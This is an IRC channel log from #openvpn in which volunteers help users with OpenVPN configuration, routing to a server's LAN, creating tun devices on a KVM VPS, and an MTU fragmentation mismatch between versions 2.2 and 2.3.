11:36 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:36 -!- Holiday [~rjr162@magichat.dlt.psu.edu] has joined #openvpn
11:37 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
11:38 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:38 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
11:39 < pekster> Note also the --key-direction in the manpage, if your peer uses a 'direction' value to its secret
11:41 < vaillor> pekster
11:41 < vaillor> it wants a certificate
11:42 < vaillor> http://pastebin.com/cPxRsW8S
11:42 -!- syn4pse [~syn@p5DDC073B.dip0.t-ipconnect.de] has quit [Ping timeout: 248 seconds]
11:45 < pekster> What wants one? That config is completely valid
11:45 < vaillor> pekster are you sure that openvpn connect for ios supports static key?
11:45 < pekster> Nope, not at all
11:46 < pekster> I'm merely asserting that the config you posted is a valid OpenVPN configuration (I copied lines 2-EOF and ran it fine)
11:48 < vaillor> is there a way to know it?
11:49 -!- bjh4 [~bjh4@12.239.198.1] has quit [Quit: Leaving]
11:52 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:52 -!- mode/#openvpn [+v s7r] by ChanServ
12:00 < jzaw> lo all
12:00 < jzaw> pekster, thanks for the advice this morn
12:00 < jzaw> I've got a routed tun working now
12:00 < jzaw> but I wonder if you can help me fix one last boggle
12:00 < jzaw> ovpn server is running in a qemu-kvm VM
12:00 < jzaw> I can ping the VM ... the host and the world
12:01 < jzaw> but I can't ping the rest of the server's lan
12:01 < jzaw> however I can ping from any box on the lan to the client this end
12:01 < pekster> !serverlan
12:01 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
12:01 < jzaw> ipv4 forwarding enabled
12:01 < pekster> I'm guessing firewall or return routing are your issue
12:01 < pekster> The flowchart has a lot more than "is forwarding enabled"...
12:02 < jzaw> I'm no nat
12:02 < jzaw> I've set a static route in m0n0wall
12:02 < jzaw> hence I'm seeing the world
12:04 < jzaw> ah different diag ... thanks
12:04 < jzaw> pekster, ^^^
12:04 < jzaw> looking
12:05 < jzaw> pekster, that flow chart doesn't seem to cover my case
12:05 < jzaw> I can ping world
12:05 < jzaw> I can ping server VM and the host
12:05 < jzaw> I can ping router
12:05 < jzaw> but can't ping other hosts on the lan
12:06 < jzaw> all hosts on the lan can ping the tunnel endpoints ... and client
12:06 < pekster> server-side LAN clients can ping the client?
12:06 < jzaw> yes
12:06 < pekster> Then you have a firewall issue
12:07 < jzaw> iptables is empty on all machines between lan client host, VM and client
12:07 < jzaw> and ip route seems to show routes down via correct ips on correct interfaces
12:08 < jzaw> else how could a lan host ping the distant vpn client? am I right in thinking?
12:10 < jzaw> pekster ... what's the convention about using this ! info ?
12:10 < jzaw> is one allowed in channel
12:10 < jzaw> !route_outside_openvpn
12:10 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
12:12 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
12:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
12:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 255 seconds]
12:32 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded]
12:47 -!- brute11k [~brute@89.249.235.169] has quit [Quit: Leaving.]
12:48 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
13:08 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds]
13:17 -!- master_o1_master [~master_of@p4FF24E96.dip.t-dialin.net] has joined #openvpn
13:20 -!- master_of_master [~master_of@p4FF24F4B.dip.t-dialin.net] has quit [Ping timeout: 245 seconds]
13:23 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has joined #openvpn
13:24 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has quit [Client Quit]
13:26 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has joined #openvpn
13:26 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
13:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds]
13:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:33 < gan_> !welcome
13:33 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki
13:33 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
13:34 < gan_> !howto
13:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
13:42 -!- raidz is now known as raidz_away
13:43 -!- raidz_away is now known as raidz
13:48 < gan_> Trying to set up openvpn server on a VPS node (KVM) running Ubuntu. I have no TUN interface apparently. Didn't really find any info; it's supposed to be created when openvpn starts, is that correct?
13:49 < gan_> Have been trying to create it in various ways. Hope someone can set me in the right direction to debug. http://pastebin.com/RkjMC69J
13:49 < Dennis84> Wulf: did you have time on the weekend to get further information?
13:51 < pekster> gan_: Are you missing tun support in the kernel? There should be an explicit error about that in your openvpn logs if that's the case
13:53 < gan_> I see a few OpenVPN messages in syslog. Is there another log and if so where?
13:53 < pekster> !log
13:53 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
13:53 < pekster> !factoids whatis log
13:53 <@vpnHelper> "log" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging
13:54 < gan_> By the way I have previously looked in what I think is the kernel config. But let me look at the log
13:57 -!- wachpwnski [~wachpwnsk@67.176.229.52] has joined #openvpn
13:57 < wachpwnski> when you use openvpn --config foo.ovpn is there any way to also state a username and password?
13:58 < pekster> wachpwnski: See --auth-user-pass in the manpage for how you can pass a file with the credentials. It's a potential security risk to do so, since your credentials must be in plaintext in this file
13:59 < wachpwnski> pekster better than copy pasting now. haha
14:00 < vaillor> pekster, is it easy to set up a configuration with ssl certificates?
14:00 < pekster> Yup. See the howto that guides you through the process
14:00 < pekster> !howto
14:00 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
14:03 < vaillor> ok thanks
14:03 < gan_> pekster: No, no errors claiming there is no TUN support. I have not built the kernel but looked in the config Ubuntu stores under /boot. It says CONFIG_TUN=y. Is there anything else needed?
14:04 < gan_> It looks like I have no device under /dev/net/tun . I was wondering if it is normal to have to create it manually. I will follow an instruction I found to mknod this.
14:04 < pekster> That should be it; you should have a /dev/net/tun character device (that's not the tun interface that openvpn creates dynamically, but it will be present with tun support loaded)
14:04 < pekster> Probably some weirdness with your virt setup then
14:05 < pekster> If you can create the device outside openvpn, you can also pass the explicit device to use. It's usually more convenient to let openvpn dynamically create the device, though
14:08 < gan_> I think I succeeded once(!) before in creating a device using "ifconfig up tun0", but never again. Or what other command would be used to create it?
14:09 < pekster> Don't use ifconfig on modern Linux distros as it's an ill-maintained pile of crap. 'ip' is the new tool you should be using
14:09 < gan_> or maybe creating is not the right word. But it appeared in ifconfig after. I think I'm missing some knowledge and testing blindly. Help appreciated on how these devices are really handled.
14:09 < gan_> Ah yes, maybe I did use ip actually. Anyway, will try.
14:09 < pekster> eg: ip tuntap add dev tun3 mode tun
14:10 < pekster> openvpn also has options to create the tun device, if you'd prefer. 'ip' is the "proper" way to do it on Linux if you're trying to do it completely outside openvpn
14:10 < pekster> Just don't use ifconfig to do it ;) (no, really. http://inai.de/2008/0219-ifconfig-sucks.php )
14:10 <@vpnHelper> Title: j.eng's site: News, Notes, Quips, Tweets, Things to share. (at inai.de)
14:11 < gan_> Ah, missed the mode. :) Thanks I vow to alias ifconfig="do not use you stupid
14:11 < pekster> Well, sadly stuff tends to break if you do that. Debian/Ubuntu in particular cling to it like it's the early 90's
14:11 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
14:11 < gan_> The plot thickens: ip returns: ioctl(TUNSETIFF): Device or resource busy
14:12 < gan_> How do I list devices that "exist"? (used to do ifconfig without any args...)
14:12 < pekster> 'ip a'
14:13 < pekster> That URL I linked shows you the correct modern replacements for ifconfig, route, and similar deprecated tools
14:13 < gan_> Guess what, it reports tun0 :)
14:13 < gan_> and ifconfig doesn't
14:14 < pekster> !learn ifconfig-linux Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. More info: http://inai.de/2008/0219-ifconfig-sucks.php
14:14 <@vpnHelper> (learn [] as ) -- Associates with . is only necessary if the message isn't sent on the channel itself. The word 'as' is necessary to separate the key from the value. It can be changed to another word via the learnSeparator registry value.
14:14 < pekster> !learn ifconfig-linux as Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. More info: http://inai.de/2008/0219-ifconfig-sucks.php
14:14 <@vpnHelper> Joo got it.
14:18 < gan_> If I'm not misreading the logs openvpn runs now without error (used --dev tun0). Yay! Next step iptables to open port and then test the client side.
14:18 < gan_> or could any further test be done locally?
14:18 < vaillor> pekster, http://openvpn.net/index.php/open-source/documentation/howto.html#policy
14:18 <@vpnHelper> Title: HOWTO (at openvpn.net)
14:18 < vaillor> seems too long
14:19 < vaillor> is there not a shorter guide?
14:19 < pekster> You're in a specific section dedicated to per-client policies
14:19 < pekster> If you do not require per-client policies, why are you concerned with it?
14:20 < pekster> You can get a "working" VPN much earlier in the guide. By the end of the "Starting up the VPN and testing for initial connectivity" section your VPN will work
14:22 < vaillor> ok
14:22 < pekster> vaillor: What does 'openvpn --mktun --dev tun1' do?
14:22 < pekster> Erm, gan_ ^^
14:22 < vaillor> root@debian-VM:/etc/openvpn# openvpn --mktun --dev tun1
14:22 < vaillor> Sat Mar 9 18:42:30 2013 TUN/TAP device tun1 opened
14:22 < vaillor> Sat Mar 9 18:42:30 2013 Persist state set to: ON
14:22 < pekster> Sorry, that was for gan_
14:22 < pekster> You can --rmtun that if you want
14:22 < gan_> Mon Mar 11 20:22:38 2013 TUN/TAP device tun1 opened
14:22 < gan_> Mon Mar 11 20:22:38 2013 Persist state set to: ON
14:23 < pekster> So, openvpn should have no problem creating your tun device
14:23 < pekster> In fact, if you didn't actually create tun0 with ip (you said it failed) openvpn probably already did do it for you
14:23 < pekster> So, I'm not sure anything is broken at all...
14:23 < gan_> Yes.
14:24 < gan_> No it's no longer broken as I said further up. It WAS broken, but now the logs look ok.
14:24 < gan_> Just one question, with openvpn running I should not expect the tun interface to have an IP address? E.g. 10.8.something in the default config? ip now reports the interface but no bound address
14:25 < gan_> So ip a reports: 3: tun0: mtu 1500 qdisc noop state DOWN qlen 100 link/none
14:25 < pekster> It needs to be assigned an IP through your config, either via 'ifconfig' or via a pushed option on the server-side with use of --client or --pull by the client
14:25 < pekster> That shows it's also down
14:26 < pekster> openvpn should be setting it as "up" when it uses it. Can you try stopping openvpn, remove any extra tun interfaces you've created, and start it again without an explicit device?
14:26 < gan_> Yes will do
14:26 < pekster> It should dynamically create the device itself, minus any problems your virt solution is giving you
14:26 < gan_> got it
14:28 < pekster> With CONFIG_TUN=y in the kernel, you shouldn't even need to load the module first. You "should" have /dev/net/tun as described in the kernel docs under Documentation/networking/tuntap.txt
14:31 < gan_> Something is strange because I have "dev tun" in server.config, but just running with no args (except an explicit --log myfile.txt) yields "Options error: You must define TUN/TAP device (--dev)" and then it exits
14:32 < gan_> I would have guessed the server.config does the same thing?
14:32 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
14:34 < pekster> If you run with no args at all except a log, yes, it is expected it will complain that it doesn't know what device type you want
14:35 < pekster> The "most minimal" command you could feasibly use from the command-line would be: openvpn --dev tun --secret k.key
14:35 < pekster> That will use a static key you provide in tun mode and open for listening connections. No address configuration, etc
14:41 < gan_> OK, must have misunderstood you. Anyhow, I think I'll push forward trying to get the interfaces up and see what happens
14:42 < gan_> I assigned an address to tun0. It now seems active and quite OK because OpenVPN brings it up and down as it is started and shut down (but not sure if the address I forced is correct?)
14:42 < pekster> Oh, yea, by start without explicit device, I mean don't pre-created it :)
14:42 < pekster> create*
14:43 < pekster> See --ifconfig and --ifconfig-push in the manpage. Also relevant: --server and --ifconfig-pool
14:43 < gan_> OK :) But I think we moved forward only when I explicitly did a mknod /dev/net/tun
14:43 < pekster> It's another convenience/abstraction openvpn provides so you don't need per-OS ways to handle addressing
14:43 < pekster> Yea, seems your virt solution has tun support in the kernel but does not provide the /dev/net/tun character device node for you on boot
14:44 < pekster> I'd add that to your openvpn initscript or at a place logical for your distro
14:44 < gan_> got it.
14:44 < gan_> tun1 is another if I created with ip. It does not have an ip assigned. OpenVPN does NOT succeed in bringing it UP when starting --dev tun1
14:45 < gan_> Strange details. Anyhow, assuming tun0 now seems relatively sane, is there a risk I have assigned a static address to it?
14:45 < pekster> [ -c /dev/net/tun ] || mknod /dev/net/tun c 10 200 || some_error_func "mknod failed"
14:45 < gan_> Or should it have a static address?
14:45 < gan_> thanks, copied for inclusion in bootup
14:46 < pekster> You don't want static addresses to collide with a pool handed to other clients, otherwise no
14:47 < gan_> OK, so I was about to go test the client side. Only question, can I test any connection locally first?
14:56 < pekster> You mean run the client & server on the same host? I'll do that when I'm testing configs sometimes, but it's not a great way to test if things work between different hosts
14:57 < gan_> Not sure, just taking it step by step here considering the trouble so far, and the fact that I might not know what I'm doing yet :)
14:58 < gan_> Come to think of it I think I followed the advice to remove the client keys from the server... :P I'm going for network test now instead..
14:59 < pekster> For a secure environment, your PKI should be separate from your server. It's a security risk to keep your CA key on the server, although many people do it anyway accepting that risk
14:59 < pekster> Easy-RSA can be run from any system you'd like
15:00 < gan_> Yeah, I've done all the cert and key generation with easy-rsa
15:01 < pekster> The way the howto shows is the "abridged intro" to Easy-RSA. It's possible to use it to split the keypair generation and signing into separate steps, so your private keys never leave the system you use them on
15:05 < gan_> Yup. I get it. Still, need more hands-on experience to do something like that. I forgot to state the ultimate goal. Security isn't super critical because there won't be a LAN this time around (although I intend to do this for home network later). This setup is nothing but a single forwarding proxy
15:06 < gan_> Or it's intended to be, if I succeed that is :P
15:06 -!- hatschi [~marvin@dslb-092-074-209-205.pools.arcor-ip.net] has joined #openvpn
15:06 < pekster> Sure, and it's all relative. Many people use Easy-RSA on the server and like it due to ease of use. Other people have a secure room with encrypted offline PKI storage that requires 2 authorized officers to approve access to the CA. All depends on your needs really
15:07 < hatschi> hi there
15:08 < pekster> fwiw, the next-gen version of Easy-RSA (I'm actually authoring some prototype code for it as we speak) will make it much easier to generate/sign on different boxes
15:08 < pekster> No silly "org/city/state" stuff, unless you want to enable it
15:08 * gan_ is planning to build a secure room and hire 2 officers
15:08 < hatschi> somebody here having a minute or two to have an eye on my openvpn 2.2 to openvpn 2.3 update test issues?
15:08 < pekster> !ask
15:08 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
15:10 < pekster> ~/src/ersa-3.x $ grep FIXME * 2>/dev/null | wc -l
15:10 < pekster> 13
15:10 < pekster> Just a few things to fix first ;)
15:11 < hatschi> okay. I have several tunnels alive. all tunnels based on TCP work, but I have issues with tunnels over UDP. I have some sites with buggy routes that have troubles with UDP fragmentation, so I'm using fragment 1400 / mssfix in my config.
15:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
15:12 < hatschi> the config works fine with 2.2, but when using 2.3 both ends log WARNING: 'link-mtu' is used inconsistently, local='link-mtu 1546', remote='link-mtu 1542' and WARNING: 'mtu-dynamic' is present in local config but missing in remote config, local='mtu-dynamic'. Also the server complains with 'Bad LZO decompression header byte:' many times...
15:13 < hatschi> as far as I know fragmentation adds 1 or 2 bytes overhead to the packet. for me it seems that the 2.3 client has trouble understanding the fragment command. is there something new in fragmentation with 2.3 I missed?
15:15 < pekster> --fragment prevents UDP packets from being sent that are larger than the specified size. For it to work if you have a network connection with broken PMTU between the peers, both sides will need to match the value. Are you also tweaking any of the --link-mtu or --tun-mtu options? Those need to match too, and are generally best left alone
15:17 < pekster> You might try disabling lzo on both clients and see what the MTU is between your links using the --mtu-test option added to a working config on the client. It'll take a few minutes to complete, but it'll test and report the MTU that you can use to tune --fragment and --mssfix
15:17 < hatschi> fragment is the same on both ends. the original config also sets tun-mtu 1500 (I read somewhere that's the right choice) and it worked for me in this setup. I had no mtu issues from broken DSL-routers with this issue.
15:18 < gan_> I'm clearly way out of my league here... but learned once that ICMP is used to report fragmentation stuff. So if any of your intermediate routers/firewalls are blocking all ICMP (because you think it's a good idea to drop pings) you might want to check it.
15:18 < hatschi> I have none of these routers accessible at the moment, but I tested it with 2.2 and it was somewhere around 1400. as already mentioned, the config works with 2.2 but fails with 2.3...
15:20 < pekster> Right, that's a little odd. I'm not aware of an intentional change that would break that. The mismatch on link-mtu and mtu-dynamic warnings would appear to be a mismatch between the 2 peers' settings
15:20 -!- Orbi [~opera@93.182.148.191] has joined #openvpn
15:21 < hatschi> gan_: I know quite well which devices are causing the trouble - but I have to live with them. and yes, sending ICMP would be the right way… but these things just drop packets exceeding 146? bytes initially and after some time it seems that the device even stops forwarding packets for this port...
15:21 < pekster> The good news is that IPv6 mandates PMTU handling as part of its protocol. The bad news is that you're not using it
15:22 < hatschi> pekster: I already had this idea too. and the missing 2 bytes in the link mtu could fit to the bytes added by fragmentation. also the 2nd message about 'mtu-dynamic' - it's the old config keyword for fragmentation.
15:22 < pekster> Yea, I mean you can try an even smaller fragment size and see if it goes away, or try disabling comp-lzo completely to see if at least you can reduce those errors to eliminate the possibility some comp-lzo mismatch is messing with packet sizes
15:22 < pekster> Right
15:23 < hatschi> any idea or pointer where I can see if the client has enabled fragmentation? is there anything I can see from the logs?
15:23 < pekster> It sounds like one end is deciding that PMTU detection allows for a size of X, but the other peer ends up using Y, and thus comp-lzo freaks out when it can't decompress the packet
15:23 < gan_> hatschi: ok, I can only wish you good luck then :)
15:23 < pekster> --verb 4 should show you full config on startup, unless you're using an "official" build of 2.3.0 since bug #260 makes verb 4 worthless :\
15:24 < hatschi> just give me a sec, I'll disable lzo and see what happens.
15:24 < pekster> (if you can build from source, set enable_debug=yes when you build and --verb 4 works normally)
15:25 < pekster> I don't really think lzo is your issue (that is, if you already checked it matches on both peers) but it might be masking the real issue
15:26 < hatschi> I also think that lzo is using the wrong entry because of the 2 byte link-mtu entrance - I assume the server cuts off 2 bytes because it thinks they are for fragmentation.
15:26 < hatschi> wait a moment I think I've also seen some other logs....
15:27 < pekster> Remember that comp-lzo has multiple modes, including on/off/adaptive
15:27 < hatschi> yep: FRAG_IN error flags=0xfa450005: bad fragment size
15:27 < hatschi> FRAG_IN error flags=0xfa2a187b: FRAG_TEST not implemented
15:27 < pekster> Oh, this rings some vague bell. I remember hunting in the code for that FRAG_TEST recently
15:30 < hatschi> okay, I've disabled LZO and have a bunch of new messages:
15:30 < hatschi> FRAG_IN error flags=0x45000040: spurrious FRAG_WHOLE flags
15:30 < hatschi> IP packet with unknown IP version=0 seen
15:30 < hatschi> IP packet with unknown IP version=3 seen
15:31 < pekster> comp_lzo is disabled on *both* ends?
15:31 < hatschi> FRAG_IN error flags=0x45000045: bad fragment size
15:31 < hatschi> yes, on both ends ;)
15:31 < hatschi> FRAG_IN error flags=0x45000030: spurrious FRAG_WHOLE flags
15:31 < pekster> That error about IP version should only pop up when a corrupt (ill-formatted) packet comes through
15:31 < hatschi> or if the server expects fragmented packets but the client doesn't fragment...
15:32 < hatschi> btw: the server is a multiserver....
15:33 < pekster> The FRAG_TEST is defined to 3, so that is possibly where the IP version thing comes from (only values 4 & 6 are valid IP versions, for IPv4 and IPv6 traffic.)
15:33 < pekster> Any other value there is assumed to be a malformed packet, thus logged and dropped
15:34 < hatschi> let me do a bogus test: I remove fragment from the server, but leave it on the client..
15:34 < pekster> Ultimately you want to try and correct the mismatch on the link-mtu, since that's probably the cause of the corruption
15:35 < pekster> I'm not well equipped right now to mess with reduced MTU links, but I'm curious what happens if I set up 2 lab networks with a standard 1500 MTU and link them across something smaller, 146x as you suggest
15:35 < pekster> 2.2.x and 2.3
15:36 < hatschi> just use a normal link (I'm also trying it within two vm's right now) and just add fragment 1400 / mssfix to both ends…
15:36 < hatschi> gotcha: removing fragment from server, leaving it on the client generates a working link with no warnings…. ;)
15:37 < pekster> And the server is your 2.2.x system?
15:37 < hatschi> I already updated the server to 2.3 and have the same issue. doesn't matter if the server is 2.2 or 2.3
15:37 < hatschi> let me see if I find the old 2.2 binaries for the client...
15:38 < pekster> Ah, so you didn't have this issue 2.2.2 to 2.2.2? But do have this issue if one or both peers is 2.3.0?
15:38 < hatschi> yep.
15:38 < pekster> Or am I misunderstanding that
15:42 < hatschi> okay… 2.2 client with fragmentation enabled to 2.3 with fragmentation disabled: MTU-Warnings, IP packet with unknown IP version=0 seen and non-working link.
15:42 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn
15:42 -!- athetius_ [~sollux@athetius.com] has joined #openvpn
15:42 -!- roue_ [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn
15:42 -!- Rienzilha [rien@sinas.rename-it.nl] has joined #openvpn
15:42 -!- zu_ [~zu@ks387228.kimsufi.com] has joined #openvpn
15:42 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn
15:43 < hatschi> now I re-enabled fragmentation on the server again -> now it's working with 2.3 server and 2.2 client.
15:45 < hatschi> so for me it seems that there is an issue with fragmentation in 2.3 client mode..
15:45 < hatschi> pekster: do you have the chance to verify this?
15:46 < pekster> Works for me 2.3 to 2.3
15:46 < pekster> Do you explicitly need a 2.2.2 client?
15:46 < hatschi> it works for me with 2.2 client to 2.2 or 2.3 server but not with 2.3 client to 2.2 or 2.3 server.
15:47 < pekster> I'm using a minimal config: http://paste.kde.org/693710/
15:47 < pekster> This works fine, no warnings on startup, etc
15:47 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 246 seconds]
15:47 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 246 seconds]
15:47 -!- athetius [~sollux@athetius.com] has quit [Ping timeout: 246 seconds]
15:47 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 246 seconds]
15:47 -!- Rienzilla [rien@sinas.rename-it.nl] has quit [Ping timeout: 246 seconds]
15:47 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 246 seconds]
15:47 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 246 seconds]
15:47 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 246 seconds]
15:47 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 246 seconds]
15:47 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has quit [Read error: Connection reset by peer]
15:47 -!- Netsplit *.net <-> *.split quits: Olipro, [fred]
15:47 -!- dazo is now known as dazo_afk
15:48 < hatschi> okay, I'm working with certificates but this shouldn't matter.
15:48 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn
15:48 -!- Netsplit over, joins: [fred]
15:48 < pekster> Right, data channel is still secured using symmetric keys after startup (I suppose the options exchange would be different)
15:49 < pekster> But I get no problems pinging with packets at the link-mtu of 1500 with the fragmentation
15:49 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn
15:49 < hatschi> is fragment server-pushable?
15:49 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
15:53 -!- bla [bla@vivane.thera.be] has joined #openvpn
15:53 -!- bla [bla@vivane.thera.be] has quit [Changing host]
15:53 -!- bla [bla@unaffiliated/bla] has joined #openvpn
15:53 -!- kirin` [telex@gateway/shell/anapnea.net/x-fqcxzfjrwhmymqfg] has quit [Read error: Connection reset by peer]
15:54 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn
16:01 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving]
16:01 < hatschi> pekster: I've also cloned 2 vm's right now. it works with the minimal config. I'll try to break down my config to reproduce this issue…
16:02 < pekster> Yea, sounds like a good plan
16:02 < hatschi> I hope this is not a windows related problem… ;)
16:04 -!- kloeri_ is now known as kloeri
16:22 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds]
16:31 < hatschi> pekster: still alive?
16:31 < hatschi> pekster: tracked it down...
16:32 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving]
16:33 < hatschi> pekster: this config reproduces the issue: http://paste.kde.org/693740/
16:33 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
16:33 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Client Quit]
16:34 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
16:35 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving]
16:38 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 256 seconds]
16:40 < hatschi> pekster: it's quite late here, I'm going to bed now. I don't know if I have a chance to pass by tomorrow… maybe you can reproduce this issue with the new config. the trick is to use remote [ip] [port] in configuration. this triggers the fragmentation misbehaviour...
16:41 < hatschi> bye all
16:41 -!- hatschi [~marvin@dslb-092-074-209-205.pools.arcor-ip.net] has left #openvpn []
16:47 -!- bla [bla@unaffiliated/bla] has quit [Ping timeout: 248 seconds]
16:47 -!- bla [bla@unaffiliated/bla] has joined #openvpn
16:47 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 245 seconds]
16:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds]
16:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 255 seconds]
16:58 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn
17:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
17:18 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
17:20 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
17:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
17:24 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds]
17:24 -!- Cpt_Oblivious is now known as Cpt-Oblivious
17:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
17:42 -!- Orbi [~opera@93.182.148.191] has left #openvpn []
17:45 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn
17:46 -!- p3rror [~mezgani@41.140.169.138] has quit [Client Quit]
17:51 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Quit: ZNC - http://znc.in]
17:52 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
18:01 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Excess Flood]
18:02 -!- gan_ [~gan@c-13fde155.125-11-64736c12.cust.bredbandsbolaget.se] has quit [Quit: leaving]
18:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
18:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-tyxibxesfaawsxwh] has joined #openvpn
18:07 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 245 seconds]
18:13 -!- eHAPPY [~V1CE@ip174-73-3-95.no.no.cox.net] has joined #openvpn
18:14 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
18:17 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:17 -!- mode/#openvpn [+v s7r] by ChanServ
18:22 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds]
18:24 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:24 -!- mode/#openvpn [+v s7r] by ChanServ
18:26 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds]
18:27 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn
18:29 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 250 seconds]
18:31 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
18:31 -!- mode/#openvpn [+v s7r] by ChanServ
